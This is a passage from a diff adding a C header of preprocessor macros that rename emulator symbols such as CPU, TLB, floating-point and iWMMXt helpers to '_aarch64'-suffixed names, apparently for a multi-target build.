restore_state_to_opc restore_state_to_opc_aarch64 +#define arm_rmode_to_sf arm_rmode_to_sf_aarch64 +#define arm_singlestep_active arm_singlestep_active_aarch64 +#define tlb_fill tlb_fill_aarch64 +#define tlb_flush tlb_flush_aarch64 +#define tlb_flush_page tlb_flush_page_aarch64 +#define tlb_set_page tlb_set_page_aarch64 +#define arm_translate_init arm_translate_init_aarch64 +#define arm_v7m_class_init arm_v7m_class_init_aarch64 +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_aarch64 +#define ats_access ats_access_aarch64 +#define ats_write ats_write_aarch64 +#define bad_mode_switch bad_mode_switch_aarch64 +#define bank_number bank_number_aarch64 +#define bitmap_zero_extend bitmap_zero_extend_aarch64 +#define bp_wp_matches bp_wp_matches_aarch64 +#define breakpoint_invalidate breakpoint_invalidate_aarch64 +#define build_page_bitmap build_page_bitmap_aarch64 +#define bus_add_child bus_add_child_aarch64 +#define bus_class_init bus_class_init_aarch64 +#define bus_info bus_info_aarch64 +#define bus_unparent bus_unparent_aarch64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_aarch64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_aarch64 +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_aarch64 +#define call_recip_estimate call_recip_estimate_aarch64 +#define can_merge can_merge_aarch64 +#define capacity_increase capacity_increase_aarch64 +#define ccsidr_read ccsidr_read_aarch64 +#define check_ap check_ap_aarch64 +#define check_breakpoints check_breakpoints_aarch64 +#define check_watchpoints check_watchpoints_aarch64 +#define cho cho_aarch64 +#define clear_bit clear_bit_aarch64 +#define clz32 clz32_aarch64 +#define clz64 clz64_aarch64 +#define cmp_flatrange_addr cmp_flatrange_addr_aarch64 +#define code_gen_alloc code_gen_alloc_aarch64 +#define commonNaNToFloat128 commonNaNToFloat128_aarch64 +#define commonNaNToFloat16 commonNaNToFloat16_aarch64 +#define commonNaNToFloat32 commonNaNToFloat32_aarch64 +#define commonNaNToFloat64 commonNaNToFloat64_aarch64 +#define commonNaNToFloatx80 commonNaNToFloatx80_aarch64 +#define compute_abs_deadline compute_abs_deadline_aarch64 +#define cond_name cond_name_aarch64 +#define configure_accelerator configure_accelerator_aarch64 +#define container_get container_get_aarch64 +#define container_info container_info_aarch64 +#define container_register_types container_register_types_aarch64 +#define contextidr_write contextidr_write_aarch64 +#define core_log_global_start core_log_global_start_aarch64 +#define core_log_global_stop core_log_global_stop_aarch64 +#define core_memory_listener core_memory_listener_aarch64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_aarch64 +#define cortex_a15_initfn cortex_a15_initfn_aarch64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_aarch64 +#define cortex_a8_initfn cortex_a8_initfn_aarch64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_aarch64 +#define cortex_a9_initfn cortex_a9_initfn_aarch64 +#define cortex_m3_initfn cortex_m3_initfn_aarch64 +#define count_cpreg count_cpreg_aarch64 +#define countLeadingZeros32 countLeadingZeros32_aarch64 +#define countLeadingZeros64 countLeadingZeros64_aarch64 +#define cp_access_ok cp_access_ok_aarch64 +#define cpacr_write cpacr_write_aarch64 +#define cpreg_field_is_64bit cpreg_field_is_64bit_aarch64 +#define cp_reginfo cp_reginfo_aarch64 +#define cpreg_key_compare cpreg_key_compare_aarch64 +#define cpreg_make_keylist cpreg_make_keylist_aarch64 +#define cp_reg_reset cp_reg_reset_aarch64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_aarch64 +#define cpsr_read cpsr_read_aarch64 +#define cpsr_write cpsr_write_aarch64 +#define cptype_valid cptype_valid_aarch64 +#define cpu_abort cpu_abort_aarch64 +#define cpu_arm_exec cpu_arm_exec_aarch64 +#define cpu_arm_gen_code cpu_arm_gen_code_aarch64 +#define cpu_arm_init cpu_arm_init_aarch64 +#define cpu_breakpoint_insert cpu_breakpoint_insert_aarch64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_aarch64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_aarch64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_aarch64 +#define cpu_can_do_io cpu_can_do_io_aarch64 +#define cpu_can_run cpu_can_run_aarch64 +#define cpu_class_init cpu_class_init_aarch64 +#define cpu_common_class_by_name cpu_common_class_by_name_aarch64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_aarch64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_aarch64 +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_aarch64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_aarch64 +#define cpu_common_has_work cpu_common_has_work_aarch64 +#define cpu_common_initfn cpu_common_initfn_aarch64 +#define cpu_common_noop cpu_common_noop_aarch64 +#define cpu_common_parse_features cpu_common_parse_features_aarch64 +#define cpu_common_realizefn cpu_common_realizefn_aarch64 +#define cpu_common_reset cpu_common_reset_aarch64 +#define cpu_dump_statistics cpu_dump_statistics_aarch64 +#define cpu_exec_init cpu_exec_init_aarch64 +#define cpu_flush_icache_range cpu_flush_icache_range_aarch64 +#define cpu_gen_init cpu_gen_init_aarch64 +#define cpu_get_clock cpu_get_clock_aarch64 +#define cpu_get_real_ticks cpu_get_real_ticks_aarch64 +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_aarch64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_aarch64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_aarch64 +#define cpu_inb cpu_inb_aarch64 +#define cpu_inl cpu_inl_aarch64 +#define cpu_interrupt cpu_interrupt_aarch64 +#define cpu_interrupt_handler cpu_interrupt_handler_aarch64 +#define cpu_inw cpu_inw_aarch64 +#define cpu_io_recompile cpu_io_recompile_aarch64 +#define cpu_is_stopped cpu_is_stopped_aarch64 +#define cpu_ldl_code cpu_ldl_code_aarch64 +#define cpu_ldub_code cpu_ldub_code_aarch64 +#define cpu_lduw_code cpu_lduw_code_aarch64 +#define cpu_memory_rw_debug cpu_memory_rw_debug_aarch64 +#define cpu_mmu_index cpu_mmu_index_aarch64 +#define cpu_outb cpu_outb_aarch64 +#define cpu_outl cpu_outl_aarch64 +#define cpu_outw cpu_outw_aarch64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_aarch64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_aarch64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_aarch64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_aarch64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_aarch64 +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_aarch64 +#define cpu_physical_memory_map cpu_physical_memory_map_aarch64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_aarch64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_aarch64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_aarch64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_aarch64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_aarch64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_aarch64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_aarch64 +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_aarch64 +#define cpu_register cpu_register_aarch64 +#define cpu_register_types cpu_register_types_aarch64 +#define cpu_restore_state cpu_restore_state_aarch64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_aarch64 +#define cpu_single_step cpu_single_step_aarch64 +#define cpu_tb_exec cpu_tb_exec_aarch64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_aarch64 +#define cpu_to_be64 cpu_to_be64_aarch64 +#define cpu_to_le32 cpu_to_le32_aarch64 +#define cpu_to_le64 cpu_to_le64_aarch64 +#define cpu_type_info cpu_type_info_aarch64 +#define cpu_unassigned_access cpu_unassigned_access_aarch64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_aarch64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_aarch64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_aarch64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_aarch64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_aarch64 +#define crc32c_table crc32c_table_aarch64 +#define create_new_memory_mapping create_new_memory_mapping_aarch64 +#define csselr_write csselr_write_aarch64 +#define cto32 cto32_aarch64 +#define ctr_el0_access ctr_el0_access_aarch64 +#define ctz32 ctz32_aarch64 +#define ctz64 ctz64_aarch64 +#define dacr_write dacr_write_aarch64 +#define dbgbcr_write dbgbcr_write_aarch64 +#define dbgbvr_write dbgbvr_write_aarch64 +#define dbgwcr_write dbgwcr_write_aarch64 +#define dbgwvr_write dbgwvr_write_aarch64 +#define debug_cp_reginfo debug_cp_reginfo_aarch64 +#define debug_frame debug_frame_aarch64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_aarch64 +#define define_arm_cp_regs define_arm_cp_regs_aarch64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_aarch64 +#define define_debug_regs define_debug_regs_aarch64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_aarch64 +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_aarch64 +#define deposit32 deposit32_aarch64 +#define deposit64 deposit64_aarch64 +#define deregister_tm_clones deregister_tm_clones_aarch64 +#define device_class_base_init device_class_base_init_aarch64 +#define device_class_init device_class_init_aarch64 +#define device_finalize device_finalize_aarch64 +#define device_get_realized device_get_realized_aarch64 +#define device_initfn device_initfn_aarch64 +#define device_post_init device_post_init_aarch64 +#define device_reset device_reset_aarch64 +#define device_set_realized device_set_realized_aarch64 +#define device_type_info device_type_info_aarch64 +#define disas_arm_insn disas_arm_insn_aarch64 +#define disas_coproc_insn disas_coproc_insn_aarch64 +#define disas_dsp_insn disas_dsp_insn_aarch64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_aarch64 +#define disas_neon_data_insn disas_neon_data_insn_aarch64 +#define disas_neon_ls_insn disas_neon_ls_insn_aarch64 +#define disas_thumb2_insn disas_thumb2_insn_aarch64 +#define disas_thumb_insn disas_thumb_insn_aarch64 +#define disas_vfp_insn disas_vfp_insn_aarch64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_aarch64 +#define do_arm_semihosting do_arm_semihosting_aarch64 +#define do_clz16 do_clz16_aarch64 +#define do_clz8 do_clz8_aarch64 +#define do_constant_folding do_constant_folding_aarch64 +#define do_constant_folding_2 do_constant_folding_2_aarch64 +#define do_constant_folding_cond do_constant_folding_cond_aarch64 +#define do_constant_folding_cond2 do_constant_folding_cond2_aarch64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_aarch64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_aarch64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_aarch64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_aarch64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_aarch64 +#define do_ssat do_ssat_aarch64 +#define do_usad do_usad_aarch64 +#define do_usat do_usat_aarch64 +#define do_v7m_exception_exit do_v7m_exception_exit_aarch64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_aarch64 +#define dummy_func dummy_func_aarch64 +#define dummy_section dummy_section_aarch64 +#define _DYNAMIC _DYNAMIC_aarch64 +#define _edata _edata_aarch64 +#define _end _end_aarch64 +#define end_list end_list_aarch64 +#define eq128 eq128_aarch64 +#define ErrorClass_lookup ErrorClass_lookup_aarch64 +#define error_copy error_copy_aarch64 +#define error_exit error_exit_aarch64 +#define error_get_class error_get_class_aarch64 +#define error_get_pretty error_get_pretty_aarch64 +#define error_setg_file_open error_setg_file_open_aarch64 +#define estimateDiv128To64 estimateDiv128To64_aarch64 +#define estimateSqrt32 estimateSqrt32_aarch64 +#define excnames excnames_aarch64 +#define excp_is_internal excp_is_internal_aarch64 +#define extended_addresses_enabled extended_addresses_enabled_aarch64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_aarch64 +#define extract32 extract32_aarch64 +#define extract64 extract64_aarch64 +#define extractFloat128Exp extractFloat128Exp_aarch64 +#define extractFloat128Frac0 extractFloat128Frac0_aarch64 +#define extractFloat128Frac1 extractFloat128Frac1_aarch64 +#define extractFloat128Sign extractFloat128Sign_aarch64 +#define extractFloat16Exp extractFloat16Exp_aarch64 +#define extractFloat16Frac extractFloat16Frac_aarch64 +#define extractFloat16Sign extractFloat16Sign_aarch64 +#define extractFloat32Exp extractFloat32Exp_aarch64 +#define extractFloat32Frac extractFloat32Frac_aarch64 +#define extractFloat32Sign extractFloat32Sign_aarch64 +#define extractFloat64Exp extractFloat64Exp_aarch64 +#define extractFloat64Frac extractFloat64Frac_aarch64 +#define extractFloat64Sign extractFloat64Sign_aarch64 +#define extractFloatx80Exp extractFloatx80Exp_aarch64 +#define extractFloatx80Frac extractFloatx80Frac_aarch64 +#define extractFloatx80Sign extractFloatx80Sign_aarch64 +#define fcse_write fcse_write_aarch64 +#define find_better_copy find_better_copy_aarch64 +#define find_default_machine find_default_machine_aarch64 +#define find_desc_by_name find_desc_by_name_aarch64 +#define find_first_bit find_first_bit_aarch64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_aarch64 +#define find_ram_block find_ram_block_aarch64 +#define find_ram_offset find_ram_offset_aarch64 +#define find_string find_string_aarch64 +#define find_type find_type_aarch64 +#define _fini _fini_aarch64 +#define flatrange_equal flatrange_equal_aarch64 +#define flatview_destroy flatview_destroy_aarch64 +#define flatview_init flatview_init_aarch64 +#define flatview_insert flatview_insert_aarch64 +#define flatview_lookup flatview_lookup_aarch64 +#define flatview_ref flatview_ref_aarch64 +#define flatview_simplify flatview_simplify_aarch64 +#define flatview_unref flatview_unref_aarch64 +#define float128_add float128_add_aarch64 +#define float128_compare float128_compare_aarch64 +#define float128_compare_internal float128_compare_internal_aarch64 +#define float128_compare_quiet float128_compare_quiet_aarch64 +#define float128_default_nan float128_default_nan_aarch64 +#define float128_div float128_div_aarch64 +#define float128_eq float128_eq_aarch64 +#define float128_eq_quiet float128_eq_quiet_aarch64 +#define float128_is_quiet_nan float128_is_quiet_nan_aarch64 +#define float128_is_signaling_nan float128_is_signaling_nan_aarch64 +#define float128_le float128_le_aarch64 +#define float128_le_quiet float128_le_quiet_aarch64 +#define float128_lt float128_lt_aarch64 +#define float128_lt_quiet float128_lt_quiet_aarch64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_aarch64 +#define float128_mul float128_mul_aarch64 +#define float128_rem float128_rem_aarch64 +#define float128_round_to_int float128_round_to_int_aarch64 +#define float128_scalbn float128_scalbn_aarch64 +#define float128_sqrt float128_sqrt_aarch64 +#define float128_sub float128_sub_aarch64 +#define float128ToCommonNaN float128ToCommonNaN_aarch64 +#define float128_to_float32 float128_to_float32_aarch64 +#define float128_to_float64 float128_to_float64_aarch64 +#define float128_to_floatx80 float128_to_floatx80_aarch64 +#define float128_to_int32 float128_to_int32_aarch64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_aarch64 +#define float128_to_int64 float128_to_int64_aarch64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_aarch64 +#define float128_unordered float128_unordered_aarch64 +#define float128_unordered_quiet float128_unordered_quiet_aarch64 +#define float16_default_nan float16_default_nan_aarch64 +#define float16_is_quiet_nan float16_is_quiet_nan_aarch64 +#define float16_is_signaling_nan float16_is_signaling_nan_aarch64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_aarch64 +#define float16ToCommonNaN float16ToCommonNaN_aarch64 +#define float16_to_float32 float16_to_float32_aarch64 +#define float16_to_float64 float16_to_float64_aarch64 +#define float32_abs float32_abs_aarch64 +#define float32_add float32_add_aarch64 +#define float32_chs float32_chs_aarch64 +#define float32_compare float32_compare_aarch64 +#define float32_compare_internal float32_compare_internal_aarch64 +#define float32_compare_quiet float32_compare_quiet_aarch64 +#define float32_default_nan float32_default_nan_aarch64 +#define float32_div float32_div_aarch64 +#define float32_eq float32_eq_aarch64 +#define float32_eq_quiet float32_eq_quiet_aarch64 +#define float32_exp2 float32_exp2_aarch64 +#define float32_exp2_coefficients float32_exp2_coefficients_aarch64 +#define float32_is_any_nan float32_is_any_nan_aarch64 +#define float32_is_infinity float32_is_infinity_aarch64 +#define float32_is_neg float32_is_neg_aarch64 +#define float32_is_quiet_nan float32_is_quiet_nan_aarch64 +#define float32_is_signaling_nan float32_is_signaling_nan_aarch64 +#define float32_is_zero float32_is_zero_aarch64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_aarch64 +#define float32_le float32_le_aarch64 +#define float32_le_quiet float32_le_quiet_aarch64 +#define float32_log2 float32_log2_aarch64 +#define float32_lt float32_lt_aarch64 +#define float32_lt_quiet float32_lt_quiet_aarch64 +#define float32_max float32_max_aarch64 +#define float32_maxnum float32_maxnum_aarch64 +#define float32_maxnummag float32_maxnummag_aarch64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_aarch64 +#define float32_min float32_min_aarch64 +#define float32_minmax float32_minmax_aarch64 +#define float32_minnum float32_minnum_aarch64 +#define float32_minnummag float32_minnummag_aarch64 +#define float32_mul float32_mul_aarch64 +#define float32_muladd float32_muladd_aarch64 +#define float32_rem float32_rem_aarch64 +#define float32_round_to_int float32_round_to_int_aarch64 +#define float32_scalbn float32_scalbn_aarch64 +#define float32_set_sign float32_set_sign_aarch64 +#define float32_sqrt float32_sqrt_aarch64 +#define float32_squash_input_denormal float32_squash_input_denormal_aarch64 +#define float32_sub float32_sub_aarch64 +#define float32ToCommonNaN float32ToCommonNaN_aarch64 +#define float32_to_float128 float32_to_float128_aarch64 +#define float32_to_float16 float32_to_float16_aarch64 +#define float32_to_float64 float32_to_float64_aarch64 +#define float32_to_floatx80 float32_to_floatx80_aarch64 +#define float32_to_int16 float32_to_int16_aarch64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_aarch64 +#define float32_to_int32 float32_to_int32_aarch64 +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_aarch64 +#define float32_to_int64 float32_to_int64_aarch64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_aarch64 +#define float32_to_uint16 float32_to_uint16_aarch64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_aarch64 +#define float32_to_uint32 float32_to_uint32_aarch64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_aarch64 +#define float32_to_uint64 float32_to_uint64_aarch64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_aarch64 +#define float32_unordered float32_unordered_aarch64 +#define float32_unordered_quiet float32_unordered_quiet_aarch64 +#define float64_abs float64_abs_aarch64 +#define float64_add float64_add_aarch64 +#define float64_chs float64_chs_aarch64 +#define float64_compare float64_compare_aarch64 +#define float64_compare_internal float64_compare_internal_aarch64 +#define float64_compare_quiet float64_compare_quiet_aarch64 +#define float64_default_nan float64_default_nan_aarch64 +#define float64_div float64_div_aarch64 +#define float64_eq float64_eq_aarch64 +#define float64_eq_quiet float64_eq_quiet_aarch64 +#define float64_is_any_nan float64_is_any_nan_aarch64 +#define float64_is_infinity float64_is_infinity_aarch64 +#define float64_is_neg float64_is_neg_aarch64 +#define float64_is_quiet_nan float64_is_quiet_nan_aarch64 +#define float64_is_signaling_nan float64_is_signaling_nan_aarch64 +#define float64_is_zero float64_is_zero_aarch64 +#define float64_le float64_le_aarch64 +#define float64_le_quiet float64_le_quiet_aarch64 +#define float64_log2 float64_log2_aarch64 +#define float64_lt float64_lt_aarch64 +#define float64_lt_quiet float64_lt_quiet_aarch64 +#define float64_max float64_max_aarch64 +#define float64_maxnum float64_maxnum_aarch64 +#define float64_maxnummag float64_maxnummag_aarch64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_aarch64 +#define float64_min float64_min_aarch64 +#define float64_minmax float64_minmax_aarch64 +#define float64_minnum float64_minnum_aarch64 +#define float64_minnummag float64_minnummag_aarch64 +#define float64_mul float64_mul_aarch64 +#define float64_muladd float64_muladd_aarch64 +#define float64_rem float64_rem_aarch64 +#define float64_round_to_int float64_round_to_int_aarch64 +#define float64_scalbn float64_scalbn_aarch64 +#define float64_set_sign float64_set_sign_aarch64 +#define float64_sqrt float64_sqrt_aarch64 +#define float64_squash_input_denormal float64_squash_input_denormal_aarch64 +#define float64_sub float64_sub_aarch64 +#define float64ToCommonNaN float64ToCommonNaN_aarch64 +#define float64_to_float128 float64_to_float128_aarch64 +#define float64_to_float16 float64_to_float16_aarch64 +#define float64_to_float32 float64_to_float32_aarch64 +#define float64_to_floatx80 float64_to_floatx80_aarch64 +#define float64_to_int16 float64_to_int16_aarch64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_aarch64 +#define float64_to_int32 float64_to_int32_aarch64 +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_aarch64 +#define float64_to_int64 float64_to_int64_aarch64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_aarch64 +#define float64_to_uint16 float64_to_uint16_aarch64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_aarch64 +#define float64_to_uint32 float64_to_uint32_aarch64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_aarch64 +#define float64_to_uint64 float64_to_uint64_aarch64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_aarch64 +#define float64_trunc_to_int float64_trunc_to_int_aarch64 +#define float64_unordered float64_unordered_aarch64 +#define float64_unordered_quiet float64_unordered_quiet_aarch64 +#define float_raise float_raise_aarch64 +#define floatx80_add floatx80_add_aarch64 +#define floatx80_compare floatx80_compare_aarch64 +#define floatx80_compare_internal floatx80_compare_internal_aarch64 +#define floatx80_compare_quiet floatx80_compare_quiet_aarch64 +#define floatx80_default_nan floatx80_default_nan_aarch64 +#define floatx80_div floatx80_div_aarch64 +#define floatx80_eq floatx80_eq_aarch64 +#define floatx80_eq_quiet floatx80_eq_quiet_aarch64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_aarch64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_aarch64 +#define floatx80_le floatx80_le_aarch64 +#define floatx80_le_quiet floatx80_le_quiet_aarch64 +#define floatx80_lt floatx80_lt_aarch64 +#define floatx80_lt_quiet floatx80_lt_quiet_aarch64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_aarch64 +#define floatx80_mul floatx80_mul_aarch64 +#define floatx80_rem floatx80_rem_aarch64 +#define floatx80_round_to_int floatx80_round_to_int_aarch64 +#define floatx80_scalbn floatx80_scalbn_aarch64 +#define floatx80_sqrt floatx80_sqrt_aarch64 +#define floatx80_sub floatx80_sub_aarch64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_aarch64 +#define floatx80_to_float128 floatx80_to_float128_aarch64 +#define floatx80_to_float32 floatx80_to_float32_aarch64 +#define floatx80_to_float64 floatx80_to_float64_aarch64 +#define floatx80_to_int32 floatx80_to_int32_aarch64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_aarch64 +#define floatx80_to_int64 floatx80_to_int64_aarch64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_aarch64 +#define floatx80_unordered floatx80_unordered_aarch64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_aarch64 +#define flush_icache_range flush_icache_range_aarch64 +#define format_string format_string_aarch64 +#define fp_decode_rm fp_decode_rm_aarch64 +#define frame_dummy frame_dummy_aarch64 +#define free_range free_range_aarch64 +#define fstat64 fstat64_aarch64 +#define futex_wait futex_wait_aarch64 +#define futex_wake futex_wake_aarch64 +#define gen_aa32_ld16s gen_aa32_ld16s_aarch64 +#define gen_aa32_ld16u gen_aa32_ld16u_aarch64 +#define gen_aa32_ld32u gen_aa32_ld32u_aarch64 +#define gen_aa32_ld64 gen_aa32_ld64_aarch64 +#define gen_aa32_ld8s gen_aa32_ld8s_aarch64 +#define gen_aa32_ld8u gen_aa32_ld8u_aarch64 +#define gen_aa32_st16 gen_aa32_st16_aarch64 +#define gen_aa32_st32 gen_aa32_st32_aarch64 +#define gen_aa32_st64 gen_aa32_st64_aarch64 +#define gen_aa32_st8 gen_aa32_st8_aarch64 +#define gen_adc gen_adc_aarch64 +#define gen_adc_CC gen_adc_CC_aarch64 +#define gen_add16 gen_add16_aarch64 +#define gen_add_carry gen_add_carry_aarch64 +#define gen_add_CC gen_add_CC_aarch64 +#define gen_add_datah_offset gen_add_datah_offset_aarch64 +#define gen_add_data_offset gen_add_data_offset_aarch64 +#define gen_addq gen_addq_aarch64 +#define gen_addq_lo gen_addq_lo_aarch64 +#define gen_addq_msw gen_addq_msw_aarch64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_aarch64 +#define gen_arm_shift_im gen_arm_shift_im_aarch64 +#define gen_arm_shift_reg gen_arm_shift_reg_aarch64 +#define gen_bx gen_bx_aarch64 +#define gen_bx_im gen_bx_im_aarch64 +#define gen_clrex gen_clrex_aarch64 +#define generate_memory_topology generate_memory_topology_aarch64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_aarch64 +#define gen_exception gen_exception_aarch64 +#define gen_exception_insn gen_exception_insn_aarch64 +#define gen_exception_internal gen_exception_internal_aarch64 +#define gen_exception_internal_insn gen_exception_internal_insn_aarch64 +#define gen_exception_return gen_exception_return_aarch64 +#define gen_goto_tb gen_goto_tb_aarch64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_aarch64 +#define gen_helper_add_saturate gen_helper_add_saturate_aarch64 +#define gen_helper_add_setq gen_helper_add_setq_aarch64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_aarch64 +#define gen_helper_clz32 gen_helper_clz32_aarch64 +#define gen_helper_clz64 gen_helper_clz64_aarch64 +#define gen_helper_clz_arm gen_helper_clz_arm_aarch64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_aarch64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_aarch64 +#define gen_helper_crc32_arm gen_helper_crc32_arm_aarch64 +#define gen_helper_crc32c gen_helper_crc32c_aarch64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_aarch64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_aarch64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_aarch64 +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_aarch64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_aarch64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_aarch64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_aarch64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_aarch64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_aarch64 +#define gen_helper_double_saturate gen_helper_double_saturate_aarch64 +#define gen_helper_exception_internal gen_helper_exception_internal_aarch64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_aarch64 +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_aarch64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_aarch64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_aarch64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_aarch64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_aarch64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_aarch64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_aarch64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_aarch64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_aarch64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_aarch64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_aarch64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_aarch64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_aarch64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_aarch64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_aarch64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_aarch64 +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_aarch64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_aarch64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_aarch64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_aarch64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_aarch64 +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_aarch64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_aarch64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_aarch64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_aarch64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_aarch64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_aarch64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_aarch64 +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_aarch64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_aarch64 +#define 